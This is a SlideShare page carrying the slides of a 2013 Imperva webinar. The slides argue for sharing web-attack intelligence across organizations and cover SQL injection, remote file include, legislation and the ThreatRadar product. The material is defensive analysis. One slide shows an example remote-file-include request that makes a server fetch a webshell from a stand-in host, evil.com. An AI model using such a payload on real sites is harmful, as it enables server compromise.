The Value of Crowd-Sourced Threat Intelligence

1,299 views
1,165 views

Published on

On April 3, CNBC reported the details of a large-scale attack campaign targeting the banking industry. As a result of this campaign, multiple U.S. banks experienced website outages totaling 249 hours over a six week period. Would the damage from the attack campaign have been reduced if the banks had the ability to share crowd-sourced threat intelligence? Imperva's Application Defense Center (ADC) recently analyzed real-world traffic from sixty Web applications to identify attack patterns. The results of the study demonstrate how sharing attack patterns across a community of Web applications can significantly mitigate the risk of large-scale attack campaigns. This presentation will: identify how cross-site information sharing (crowd-sourcing) creates security intelligence, demonstrate the value of adding crowd-sourced intelligence to Web application security, and provide real-world examples of attack patterns that can be shared for community defense.

Published in: Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,299
On SlideShare
0
From Embeds
0
Number of Embeds
2
Actions
Shares
0
Downloads
28
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

The Value of Crowd-Sourced Threat Intelligence

  1. 1. © 2013 Imperva, Inc. All rights reserved.Crowd Sourced Threat IntelligenceAmichai Shulman, CTO, ImpervaConfidential1May 2013
  2. 2. © 2013 Imperva, Inc. All rights reserved.AgendaConfidential2§  Introduction to crowd sourcing and threat intelligence§  Application layer threat intelligence•  Research report§  Actionable threat intelligence•  Turning threat intelligence into community defense§  Threat intelligence and legislation•  Pros, Cons and Etat D’Affaire§  Summary & conclusions§  Q&A
  3. 3. © 2013 Imperva, Inc. All rights reserved.Amichai Shulman – CTO ImpervaConfidential3§  Speaker at Industry Events•  RSA, Appsec, Info Security UK, Black Hat§  Lecturer on Information Security•  Technion - Israel Institute of Technology§  Former security consultant to banks & financial servicesfirms§  Leads the Application Defense Center (ADC)•  Discovered over 20 commercial application vulnerabilities§  Credited by Oracle, MS-SQL, IBM and othersAmichai Shulman one of InfoWorld’s “Top 25 CTOs”
  4. 4. © 2013 Imperva, Inc. All rights reserved.HII ReportsConfidential4§  Hacker Intelligence Initiative is focused atunderstanding how attackers are operating in practice•  A different approach from vulnerability research§  Data set composition•  ~60 real world applications•  Anonymous Proxies§  More than 24 months of data§  Powerful analysis system•  Combines analytic tools with drill down capabilities
  5. 5. © 2013 Imperva, Inc. All rights reserved.IntroductionConfidential5Crowd Sourcing and Threat Information Sharing
  6. 6. © 2013 Imperva, Inc. All rights reserved.What is Crowd SourcingConfidential6§  “The Wisdom of Crowds: Why the Many Are SmarterThan the Few and How Collective Wisdom ShapesBusiness, Economies, Societies and Nations”*
  7. 7. © 2013 Imperva, Inc. All rights reserved.Crowd Sourcing in PracticeConfidential7
  8. 8. © 2013 Imperva, Inc. All rights reserved.Threat Information SharingConfidential8§  AV vendor customers sharing suspicious files with theirvendors•  Manual process•  If not manual than how do you define suspicious?§  Anti-spam vendors collecting email data from alldeployments•  Privacy?•  Confidentiality§  Customer groups for sharing battle stories•  Timely?
  9. 9. © 2013 Imperva, Inc. All rights reserved.Threat IntelligenceConfidential9§  Infer NEW information regarding future attacks fromlooking at past attacks§  Attacks across organizations share commoncharacteristics•  Sources•  Techniques•  Tools•  Timelines
  10. 10. © 2013 Imperva, Inc. All rights reserved.Application Layer Threat IntelligenceConfidential10Research report
  11. 11. © 2013 Imperva, Inc. All rights reserved.Some ObservationsConfidential11§  Most web attacks are part oflarge scale industrializedoperations•  Reuse of attack platforms•  Reuse of techniques•  Reuse of tools§  Attack campaigns spanmeaningful time frames
  12. 12. © 2013 Imperva, Inc. All rights reserved.More ObservationsConfidential12§  Izzadin Kassam attacks on US banks•  Started with a few banks 4 months ago•  Gradually add more targets to the list§  #OpIsrael / #OpUSA / #OpColombia …•  Attacks by hacktivists•  Targeted for a specific time frame•  Pick up many victims and target them with the SAME exact toolsover the attack time frame
  13. 13. © 2013 Imperva, Inc. All rights reserved.MethodologyConfidential13§  Attack data only•  60 applications•  6 months of data§  Analyze dominant attack types•  SQL Injection•  Remote File Include•  Comment Spam•  Local File Include•  Directory Traversal
  14. 14. © 2013 Imperva, Inc. All rights reserved.SQL Injection – Source Threat QuadrantConfidential14Multi target, persistentsourcesMulti target sourcesPersistent sourcesSingletons
  15. 15. © 2013 Imperva, Inc. All rights reserved.SQL Injection – Source Threat QuadrantConfidential15Multi target, persistentsources
  16. 16. © 2013 Imperva, Inc. All rights reserved.SQL Injection – Time PerspectiveConfidential1602468101214161801/01/201303/01/201305/01/201307/01/201309/01/201311/01/201313/01/201315/01/201317/01/201319/01/201321/01/201323/01/201325/01/201327/01/201329/01/201331/01/201302/02/201304/02/201306/02/201308/02/201310/02/201312/02/201314/02/201316/02/201318/02/201320/02/201322/02/201324/02/201326/02/201328/02/2013TargetsAccumulatingCurrent
  17. 17. © 2013 Imperva, Inc. All rights reserved.Comment Spam – Source Threat QuadrantConfidential17Multi target, persistentsources
  18. 18. © 2013 Imperva, Inc. All rights reserved.Remote File Include – URL Threat QuadrantConfidential18Multi target, persistentvectors
  19. 19. © 2013 Imperva, Inc. All rights reserved.Remote File Include - ExampleConfidential19§  Reconnaissance campaign based on benign URL•  http://google.com/humans.txt§  11 different applications targeted using the same URL•  5144 different requests§  Spread throughout an entire month§  Next slide shows a network graph of attack sources totargets•  We can learn about the relationship between attack sources
  20. 20. © 2013 Imperva, Inc. All rights reserved.Remote File Include - ExampleConfidential20
  21. 21. © 2013 Imperva, Inc. All rights reserved.Use of Attack ToolsConfidential21Percentage of Automated Attacks0%10%20%30%40%50%60%70%80%90%100%RFI LFI SQLi ComSpm XSS DTTotal AttacksAutomated
  22. 22. © 2013 Imperva, Inc. All rights reserved.Actionable Threat IntelligenceConfidential22Turning Threat Intelligence Into Community Defense
  23. 23. © 2013 Imperva, Inc. All rights reserved.Actionable Intelligence Life CycleConfidential23Known attackpatterns Apply on trafficto identifyattackers Knownattackers Apply on trafficto identify newpatterns
  24. 24. © 2013 Imperva, Inc. All rights reserved.Actionable Threat IntelligenceConfidential24§  Multiphase•  Distributed data collection•  Information extraction•  Analysis and knowledge generation•  Knowledge validation•  Distribution of knowledge to devices§  Cycle must be completely automated in order to providevalue in a timely manner and at scale•  Not an information sharing hub
  25. 25. © 2013 Imperva, Inc. All rights reserved.The Cost of Decision MakingConfidential25§  Problem scale is increasing•  Number of attacks is constantly growing•  Number of applications per organization is growing§  Resources are stagnant•  No additional HC§  Organizations must reduce the proportion of alerts thatrequire human decision making§  By introducing mechanisms based on actionableintelligence, organizations increase the accuracy ofdetection with respect to a larger portion of the attacks
  26. 26. © 2013 Imperva, Inc. All rights reserved.Threat Intelligence and LegislationConfidential26Pros, Cons and Etat D’Affaire
  27. 27. © 2013 Imperva, Inc. All rights reserved.Current LegislationConfidential27§  US Cyber Intelligence Sharing and Protection Act(CISPA)•  Passed late April 2013•  Sets up the LEGAL grounds for bilateral information sharingbetween private sector entities and government entities•  Addresses issues of eligibility, liability and protection of shareinformation
  28. 28. © 2013 Imperva, Inc. All rights reserved.Current LegislationConfidential28§  UK Cyber Security Information Sharing Partnership(CISP)•  Launched Late March 2013 (piloted through 2012)•  Sets up procedural and technical grounds for information sharingbetween private sector and government•  Comprises an operations room, reporting portal and programdefinitions•  Similar program exists for cyber crime (CCRP)
  29. 29. © 2013 Imperva, Inc. All rights reserved.ConsConfidential29§  Misuse of information by governments•  Invade privacy in various ways•  Otherwise would require court order§  Information sharing platform•  Does not provide for extraction of actionable intelligence§  Governments usually do things the wrong way•  E.g. the complexity of the STIX language
  30. 30. © 2013 Imperva, Inc. All rights reserved.ProsConfidential30§  Regulate how data is being anonymized and protected§  Encourage more organizations to take part in this effort•  Achieve better results faster•  Reduce overall damage to public§  Standardize on various components
  31. 31. © 2013 Imperva, Inc. All rights reserved.Summary & ConclusionsConfidential31
  32. 32. © 2013 Imperva, Inc. All rights reserved.SummaryConfidential32§  Threat intelligence has a measurable potential value forWeb application attacks§  Threat intelligence can be used to identify and detectattack sources, attack vectors and attack tools§  Actionable threat intelligence is crucial for exploiting thepotential value of threat intelligence•  Not information sharing hubs•  No manual processes§  Actionable threat intelligence helps organizations reducethe cost of security decision making and enables them tohandle increasing volumes of attack traffic
  33. 33. © 2013 Imperva, Inc. All rights reserved.ThreatRadar Community DefenseConfidential33
  34. 34. © 2013 Imperva, Inc. All rights reserved.ThreatRadar Community Defense34
  35. 35. © 2013 Imperva, Inc. All rights reserved.ThreatRadar Community Defense35ThreatRadar Community Defense§  Gathers live attack data fromSecureSphere WAFs around the world§  Distributes attack patterns andreputation data in near-real time
  36. 36. © 2013 Imperva, Inc. All rights reserved.1. SecureSpheredetects a possibleRFI attackThreatRadarServersInternetUserWeb Servers2. Sends event toThreatRadar CloudCommunity Defense – How It Works© Copyright 2012 Imperva, Inc. All rights reserved.36/vulnerable.php?C=http://evil.com/webshell.txt?3. If ThreatRadar verifies site ismalicious, it will distribute newRFI pattern to community
  37. 37. © 2013 Imperva, Inc. All rights reserved.Webinar MaterialsConfidential37Post-WebinarDiscussionsAnswers toAttendeeQuestionsWebinarRecording LinkJoin GroupJoin Imperva LinkedIn Group,Imperva Data Security Direct, for…
  38. 38. © 2013 Imperva, Inc. All rights reserved.www.imperva.com38 Confidential

×